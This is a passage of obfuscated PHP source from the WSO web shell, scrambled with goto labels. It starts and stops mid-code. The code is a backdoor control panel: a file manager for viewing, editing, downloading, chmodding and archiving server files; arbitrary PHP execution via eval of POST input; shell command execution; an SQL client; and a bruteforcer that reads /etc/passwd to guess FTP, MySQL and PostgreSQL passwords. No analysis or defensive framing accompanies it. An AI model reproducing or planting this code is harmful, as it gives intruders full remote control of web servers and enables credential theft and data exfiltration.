CqwAG; T_RpN: foreach ($_COOKIE["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["c"] . $f)) { $zip->addFile($_COOKIE["c"] . $f, $f); } elseif (@is_dir($_COOKIE["c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/")); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } goto JhWjt; JhWjt: chdir($GLOBALS["cwd"]); goto MVV2r; CqwAG: } } } elseif ($_COOKIE["act"] == "unzip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_COOKIE["f"] as $f) { if ($zip->open($_COOKIE["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_COOKIE["act"] == "tar") { goto nrwbR; QmWa1: chdir($GLOBALS["cwd"]); goto bK26y; zHKjB: wsoEx("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"])); goto QmWa1; BU3zr: $_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]); goto zHKjB; nrwbR: chdir($_COOKIE["c"]); goto BU3zr; bK26y: } goto tJ8ED; HwZnR: setcookie("f", '', time() - 3600); goto TZk2t; TZk2t: break; goto yoTwQ; tJ8ED: unset($_COOKIE["f"]); goto HwZnR; yoTwQ: default: if (!empty($_POST["p1"])) { goto TYMaj; XHEG8: WSOsetcookie("c", @$_POST["c"]); goto Unr9o; TYMaj: WSOsetcookie("act", $_POST["p1"]); goto XUMLY; XUMLY: WSOsetcookie("f", serialize(@$_POST["f"])); goto XHEG8; Unr9o: } break; } } goto bpziK; JbUVa: usort($files, "wsoCmp"); goto pBUl1; RjKbq: function wsoCmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } goto JbUVa; flVXx: $GLOBALS["sort"] = $sort; goto RjKbq; b42P7: echo "</select> "; goto zga6H; QsnjB: $dirContent = wsoScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]); goto DufhY; EoM5y: if (!empty($_POST["p1"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match)) { $sort = array($match[1], (int) $match[2]); } } goto uaEIV; ecDrl: echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>"; goto QsnjB; J7jRR: if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } goto uO4Od; zqQv8: foreach ($files as $f) { echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools',null,'" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? '' : "title='{$f["link"]}'") . "><b>[ " . htmlspecialchars($f["name"]) . " ]</b>") . "</a></td><td>" . ($f["type"] == "file" ? wsoViewSize($f["size"]) : $f["type"]) . "</td><td>" . $f["modify"] . "</td><td>" . $f["owner"] . "/" . $f["group"] . "</td><td><a href=# onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } goto b9q_L; ICFmG: $l = 0; goto zqQv8; TSLht: $n = count($dirContent); goto p625P; lC5LC: $dirs = $files = array(); goto TSLht; uaEIV: echo "<script>\xd
function sa() {
for(i=0;i<d.files.elements.length;i++)
\x9 if(d.files.elements[i].type == 'checkbox')\xd\xa \x9 d.files.elements[i].checked = d.files.elements[0].checked;\xd\xa }\xd\xa</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xd
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")'>Permissions</a></th><th>Actions</th></tr>"; goto lC5LC; b9q_L: echo "<tr><td colspan=7>\xd\xa <input type=hidden name=a value='FilesMan'>\xd\xa\x9<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>
\xa <input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xd\xa <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; goto la8rp; MMpaa: $sort = array("name", 1); goto EoM5y; bpziK: wsoHeader(); goto ecDrl; GTtN3: echo "<option value='tar'>Compress (tar.gz)</option>"; goto qCBL1; zga6H: if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar")) { echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "'> "; } goto T3WX2; DufhY: if ($dirContent === false) { goto KJVLY; PFKsl: wsoFooter(); goto ZsRi7; KJVLY: echo "Can't open this folder!"; goto PFKsl; ZsRi7: return; goto Uwcm2; Uwcm2: } goto S7vm3; T3WX2: echo "<input type='submit' value='>>'></td></tr></form></table></div>"; goto LlrBb; LlrBb: wsoFooter(); goto JxN5l; S7vm3: global $sort; goto MMpaa; pBUl1: usort($dirs, "wsoCmp"); goto zukJ7; p625P: for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => wsoPermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } goto flVXx; qCBL1: if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) { echo "<option value='paste'>Paste / Compress</option>"; } goto b42P7; zukJ7: $files = array_merge($dirs, $files); goto ICFmG; JxN5l: } goto KC9ar; xB4MH: function actionFilesTools() { goto BkWtk; URhzm: if (is_file($_POST["p1"])) { $m = array("View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch"); } else { $m = array("Chmod", "Rename", "Touch"); } goto ehyTX; gIv2Z: echo "</div>"; goto q1Rl0; ehyTX: foreach ($m as $v) { echo "<a href=# onclick="g(null,null,'" . urlencode($_POST["p1"]) . "','" . strtolower($v) . "')">" . (strtolower($v) == @$_POST["p2"] ? "<b>[ " . $v . " ]</b>" : $v) . "</a> "; } goto OeBNf; FcH_v: if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } goto XQqyZ; tJhrh: if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } goto UpcWr; hJxBN: echo "<h1>File tools</h1><div class=content>"; goto LggyK; jReNS: if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } goto URhzm; OeBNf: echo "<br><br>"; goto kfx86; vLiGd: echo "<span>Create time:</span> " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "<br><br>"; goto jReNS; LggyK: if (!file_exists(@$_POST["p1"])) { goto uyJNU; C_fb1: return; goto fRIHs; uyJNU: echo "File not exists"; goto aEu8k; aEu8k: wsoFooter(); goto C_fb1; fRIHs: } goto RVSqZ; BkWtk: if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } goto nB0r7; UpcWr: wsoHeader(); goto hJxBN; q1Rl0: wsoFooter(); goto lZIie; RVSqZ: $uid = @posix_getpwuid(@fileowner($_POST["p1"])); goto FcH_v; kfx86: switch ($_POST["p2"]) { case "view": goto QAifq; bn9Hw: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto bbBoN; bbBoN: echo "</pre>"; goto K9Wsy; GqRN7: $fp = @fopen($_POST["p1"], "r"); goto bn9Hw; K9Wsy: break; goto xBp1j; QAifq: echo "<pre class=ml1>"; goto GqRN7; xBp1j: case "highlight": if (@is_readable($_POST["p1"])) { goto QC8Iq; XU2TQ: $code = @highlight_file($_POST["p1"], true); goto MtAXT; QC8Iq: echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">"; goto XU2TQ; MtAXT: echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $code) . "</div>"; goto nntLP; nntLP: } break; case "chmod": goto P8hG1; LoNwV: break; goto AyuC5; lmil1: echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.chmod.value);return false;"><input type=text name=chmod value="" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . ""><input type=submit value=">>"></form>"; goto LoNwV; AAUh2: clearstatcache(); goto lmil1; P8hG1: if (!empty($_POST["p3"])) { goto dVl9Y; brcvZ: for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } goto NKCFJ; NKCFJ: if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!<br><script>document.mf.p3.value="";</script>"; } goto PY3E2; dVl9Y: $perms = 0; goto brcvZ; PY3E2: } goto AAUh2; AyuC5: case "edit": goto H2fMN; jCDwf: echo "</textarea><input type=submit value=">>"></form>"; goto Pjp_6; l2f3k: echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>"; goto B2Klk; YessQ: if (!empty($_POST["p3"])) { goto rcwpk; JCP0G: $fp = @fopen($_POST["p1"], "w"); goto UIGX9; UIGX9: if ($fp) { goto AyUGu; ZpECv: echo "Saved!<br><script>p3_="";</script>"; goto ukKwu; zJt34: @fclose($fp); goto ZpECv; AyUGu: @fwrite($fp, $_POST["p3"]); goto zJt34; ukKwu: @touch($_POST["p1"], $time, $time); goto w_o1Q; w_o1Q: } goto ccEmf; yLb3a: $_POST["p3"] = substr($_POST["p3"], 1); goto JCP0G; rcwpk: $time = @filemtime($_POST["p1"]); goto yLb3a; ccEmf: } goto l2f3k; H2fMN: if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } goto YessQ; B2Klk: $fp = @fopen($_POST["p1"], "r"); goto of9BR; of9BR: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto jCDwf; Pjp_6: break; goto Gznea; Gznea: case "hexdump": goto m3kPv; AuUGX: $h = array("00000000<br>", '', ''); goto GyLAr; qeOJi: $n = 0; goto AuUGX; jL3k2: echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#282828><pre>" . $h[1] . "</pre></td><td bgcolor=#333333><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; goto Ufiap; m3kPv: $c = @file_get_contents($_POST["p1"]); goto qeOJi; Lem2Z: for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { goto NPU7A; NPU7A: $n = 0; goto LQkUO; fObRZ: $h[1] .= "<br>"; goto fMXko; LQkUO: if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } goto fObRZ; fMXko: $h[2] .= "
"; goto BJu_G; BJu_G: } } goto jL3k2; GyLAr: $len = strlen($c); goto Lem2Z; Ufiap: break; goto owLSP; owLSP: case "rename": goto DPp_y; zaQju: break; goto Mf7Ir; DPp_y: if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!<br>"; } else { die("<script>g(null,null,"" . urlencode($_POST["p3"]) . "",null,"")</script>"); } } goto S0xqX; S0xqX: echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.name.value);return false;"><input type=text name=name value="" . htmlspecialchars($_POST["p1"]) . ""><input type=submit value=">>"></form>"; goto zaQju; Mf7Ir: case "touch": goto MdNj9; fcpc8: echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.touch.value);return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . ""><input type=submit value=">>"></form>"; goto vSHOq; vSHOq: break; goto RapuR; GWQpw: clearstatcache(); goto fcpc8; MdNj9: if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } goto GWQpw; RapuR: } goto gIv2Z; nB0r7: if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { goto kEAXk; LrqUY: $fp = @fopen($_POST["p1"], "r"); goto oCCHm; rpfQA: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["p1"]); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto LrqUY; oCCHm: if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } goto Vqm3n; PiFXF: header("Content-Disposition: attachment; filename=" . basename($_POST["p1"])); goto rpfQA; kEAXk: ob_start("ob_gzhandler", 4096); goto PiFXF; Vqm3n: } exit; } goto tJhrh; XQqyZ: echo "<span>Name:</span> " . htmlspecialchars(@basename($_POST["p1"])) . " <span>Size:</span> " . (is_file($_POST["p1"]) ? wsoViewSize(filesize($_POST["p1"])) : "-") . " <span>Permission:</span> " . wsoPermsColor($_POST["p1"]) . " <span>Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . "<br>"; goto vLiGd; lZIie: } goto w2GF1; etiAC: function wsoPerms($p) { goto kfyb8; GUcgT: $i .= $p & 0x1 ? $p & 0x200 ? "t" : "x" : ($p & 0x200 ? "T" : "-"); goto mshmE; kfyb8: if (($p & 0xc000) == 0xc000) { $i = "s"; } elseif (($p & 0xa000) == 0xa000) { $i = "l"; } elseif (($p & 0x8000) == 0x8000) { $i = "-"; } elseif (($p & 0x6000) == 0x6000) { $i = "b"; } elseif (($p & 0x4000) == 0x4000) { $i = "d"; } elseif (($p & 0x2000) == 0x2000) { $i = "c"; } elseif (($p & 0x1000) == 0x1000) { $i = "p"; } else { $i = "u"; } goto pqnZD; GuUyD: $i .= $p & 0x2 ? "w" : "-"; goto GUcgT; Vg6sO: $i .= $p & 0x10 ? "w" : "-"; goto vneDY; I8J2d: $i .= $p & 0x40 ? $p & 0x800 ? "s" : "x" : ($p & 0x800 ? "S" : "-"); goto yfJn7; pqnZD: $i .= $p & 0x100 ? "r" : "-"; goto FjLaa; yfJn7: $i .= $p & 0x20 ? "r" : "-"; goto Vg6sO; FjLaa: $i .= $p & 0x80 ? "w" : "-"; goto I8J2d; vneDY: $i .= $p & 0x8 ? $p & 0x400 ? "s" : "x" : ($p & 0x400 ? "S" : "-"); goto e6Pjl; e6Pjl: $i .= $p & 0x4 ? "r" : "-"; goto GuUyD; mshmE: return $i; goto MofP7; MofP7: } goto eRZM6; j4eIF: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $default_use_ajax; } goto EoPoZ; qZOco: if (isset($_POST["c"])) { @chdir($_POST["c"]); } goto sO9OV; tZUOM: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto LqaMO; B8b3D: function actionRC() { if (!@$_POST["p1"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["p1"]); } } goto dPSqc; Gop14: $disable_functions = @ini_get("disable_functions"); goto oE6Ue; oHsYW: function actionPhp() { goto s1VTJ; ujMFQ: wsoFooter(); goto dfcYP; s1VTJ: if (isset($_POST["ajax"])) { goto jtGxB; XiIjv: eval($_POST["p1"]); goto pcNS1; cL7XN: ob_start(); goto XiIjv; keRr1: exit; goto cNits; t7wh1: echo strlen($temp), "
", $temp; goto keRr1; pcNS1: $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa
\'\x0") . "';\xa"; goto t7wh1; jtGxB: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto cL7XN; cNits: } goto IyHRn; wcs04: echo "</pre></div>"; goto ujMFQ; Sz7n2: echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . "</textarea><input type=submit value=Eval style="margin-top:5px">"; goto bE4Om; t2vRD: wsoHeader(); goto om2si; oWPfu: if (!empty($_POST["p1"])) { goto uFjl_; uFjl_: ob_start(); goto XYFVS; qDLEK: echo htmlspecialchars(ob_get_clean()); goto Zre8T; XYFVS: eval($_POST["p1"]); goto qDLEK; Zre8T: } goto wcs04; IyHRn: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto t2vRD; om2si: if (isset($_POST["p2"]) && $_POST["p2"] == "info") { goto u6Vem; u6Vem: echo "<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>"; goto ClNOj; ClNOj: ob_start(); goto Z0UYj; WpKFt: $tmp = preg_replace(array("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU", "!td, th {(.*)}!msiU", "!<img[^>]+>!msiU"), array('', ".e, .v, .h, .h th {$1}", ''), $tmp); goto AiOL8; Z0UYj: phpinfo(); goto pDREm; pDREm: $tmp = ob_get_clean(); goto WpKFt; AiOL8: echo str_replace("<h1", "<h2", $tmp) . "</div><br>"; goto xiXKW; xiXKW: } goto Sz7n2; bE4Om: echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; goto oWPfu; dfcYP: } goto N84uU; jB3VR: $default_charset = "Windows-1251"; goto fj9OS; rTVjF: function actionLogout() { setcookie(md5($_SERVER["HTTP_HOST"]), '', time() - 3600); die("bye!"); } goto i6mTz; DbGtY: function actionBruteforce() { goto uMF9i; hSv50: if (isset($_POST["proto"])) { goto jX4Q5; UnBlf: if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { goto vXxXO; zFefs: if (@$_POST["reverse"]) { goto S2jvF; oahSQ: for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } goto rxcry; S2jvF: $tmp = ''; goto oahSQ; rxcry: ++$attempts; goto TfDj5; TfDj5: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } goto lNTnA; lNTnA: } goto i039d; b2CQw: ++$attempts; goto i1_FI; i1_FI: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } goto zFefs; vXxXO: $line = explode(":", $line); goto b2CQw; i039d: } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { goto kf0wF; NI_R6: if (wsoBruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } goto JCePy; kf0wF: $line = trim($line); goto byC2k; byC2k: ++$attempts; goto NI_R6; JCePy: } } } goto VERJt; jX4Q5: echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; goto LBJl4; VERJt: echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto U2KZG; ObcWW: $server = explode(":", $_POST["server"]); goto UnBlf; LBJl4: if ($_POST["proto"] == "ftp") { function wsoBruteForce($ip, $port, $login, $pass) { goto w1bnC; MJhTf: @ftp_close($fp); goto efLYK; efLYK: return $res; goto zU7bZ; aqJAG: $res = @ftp_login($fp, $login, $pass); goto MJhTf; w1bnC: $fp = @ftp_connect($ip, $port ? $port : 21); goto NYGOQ; NYGOQ: if (!$fp) { return false; } goto aqJAG; zU7bZ: } } elseif ($_POST["proto"] == "mysql") { function wsoBruteForce($ip, $port, $login, $pass) { goto nwkI1; tqKjk: @mysqli_close($res); goto lNvU5; nwkI1: $res = @mysqli_connect($ip . ":" . $port ? $port : 3306, $login, $pass); goto tqKjk; lNvU5: return $res; goto h_hcl; h_hcl: } } elseif ($_POST["proto"] == "pgsql") { function wsoBruteForce($ip, $port, $login, $pass) { goto ucMyA; DgnPW: @pg_close($res); goto qQMP_; qQMP_: return $res; goto N73qn; ucMyA: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto szIUy; szIUy: $res = @pg_connect($str); goto DgnPW; N73qn: } } goto px18Z; px18Z: $success = 0; goto aKdd5; aKdd5: $attempts = 0; goto ObcWW; U2KZG: } goto NNTq8; NNTq8: echo "<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>" . "<input type=hidden name=c value="" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value="" . htmlspecialchars($_POST["a"]) . "">" . "<input type=hidden name=charset value="" . htmlspecialchars($_POST["charset"]) . "">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value="127.0.0.1"></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>" . "<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>" . "<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>" . "<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value="" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>"; goto HIh7o; uMF9i: wsoHeader(); goto hSv50; HIh7o: echo "</div><br>"; goto wlwoF; wlwoF: wsoFooter(); goto p3uSI; p3uSI: } goto wVO2a; uf2tU: $default_use_ajax = true; goto jB3VR; d62j5: function wsoEx($in) { $out = shell_exec($in); return $out; } goto yXkOt; wVO2a: function actionSql() { goto pXyEP; WqMW0: if (@$_POST["type"] == "pgsql") { echo "selected"; } goto bZFnU; qgUXu: echo "</div>"; goto G862b; G862b: wsoFooter(); goto gsteZ; bZFnU: echo ">PostgreSql</option></select></td>
\xa<td><input type=text name=sql_host value="" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . ""></td>\xd
<td><input type=text name=sql_login value="" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . ""></td>
\xa<td><input type=text name=sql_pass value="" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . ""></td><td>"; goto dxViD; dxViD: $tmp = "<input type=text name=sql_base value=''>"; goto L_VIT; Auorx: echo "</td>\xd\xa\x9 \x9 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>\xd\xa <td><input type=checkbox name=sql_count value='on'" . (empty($_POST["sql_count"]) ? '' : " checked") . "> count the number of rows</td>\xd\xa \x9</tr>\xd\xa\x9 </table>
\x9<script>\xd
s_db='" . @addslashes($_POST["sql_base"]) . "';\xd\xa function fs(f) {\xd\xa if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xd
if(f.p1) f.p1.value='';\xd
if(f.p2) f.p2.value='';\xd\xa if(f.p3) f.p3.value='';\xd\xa }
\xa }\xd
\x9 \x9function st(t,l) {
\xa\x9\x9 \x9d.sf.p1.value = 'select';\xd
\x9\x9 d.sf.p2.value = t;
\xa if(l && d.sf.p3) d.sf.p3.value = l;\xd
d.sf.submit();
}
\x9\x9function is() {\xd\xa \x9\x9 for(i=0;i<d.sf.elements['tbl[]'].length;++i)\xd\xa\x9\x9 \x9d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\xd\xa\x9\x9 }\xd\xa \x9</script>"; goto omuNC; omuNC: if (isset($db) && $db->link) { goto wQooQ; v7m0f: if (!empty($_POST["sql_base"])) { goto Rgzyg; MvXdD: if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { goto p5kAe; FQZVM: while ($item = $db->fetch()) { if (!$title) { goto UHBlV; UHBlV: echo "<tr>"; goto hcvnp; krRoK: $line = 2; goto OQDWZ; hcvnp: foreach ($item as $key => $value) { echo "<th>" . $key . "</th>"; } goto gYEfe; s133J: $title = true; goto vdCQU; vdCQU: echo "</tr><tr>"; goto krRoK; gYEfe: reset($item); goto s133J; OQDWZ: } echo "<tr class="l" . $line . "">"; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "<td><i>null</i></td>"; } else { echo "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } echo "</tr>"; } goto LonsA; c36CC: $line = 1; goto FQZVM; LonsA: echo "</table>"; goto zCgso; vhOW_: echo "<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">"; goto c36CC; p5kAe: $title = false; goto vhOW_; zCgso: } else { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } } goto f63uD; f63uD: echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; goto l03yb; Rgzyg: $db->selectdb($_POST["sql_base"]); goto QW0Ku; uEPKu: if (@$_POST["p1"] == "select") { goto mAhBO; IznKf: if ($_POST["p3"] > 1) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>< Prev</a>"; } goto ZoHo3; l2Xna: $pages = ceil($num["n"] / 30); goto ZYT4s; mAhBO: $_POST["p1"] = "query"; goto e_ZJ4; ZYT4s: echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; goto uoZpe; Es7M3: $num = $db->fetch(); goto l2Xna; uoZpe: echo " of {$pages}"; goto IznKf; rczWG: $_POST["p3"]--; goto bhg9h; e_ZJ4: $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; goto Lo_J9; nEjUO: echo "<br><br>"; goto IQ9di; bhg9h: if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } goto nEjUO; Lo_J9: $db->query("SELECT 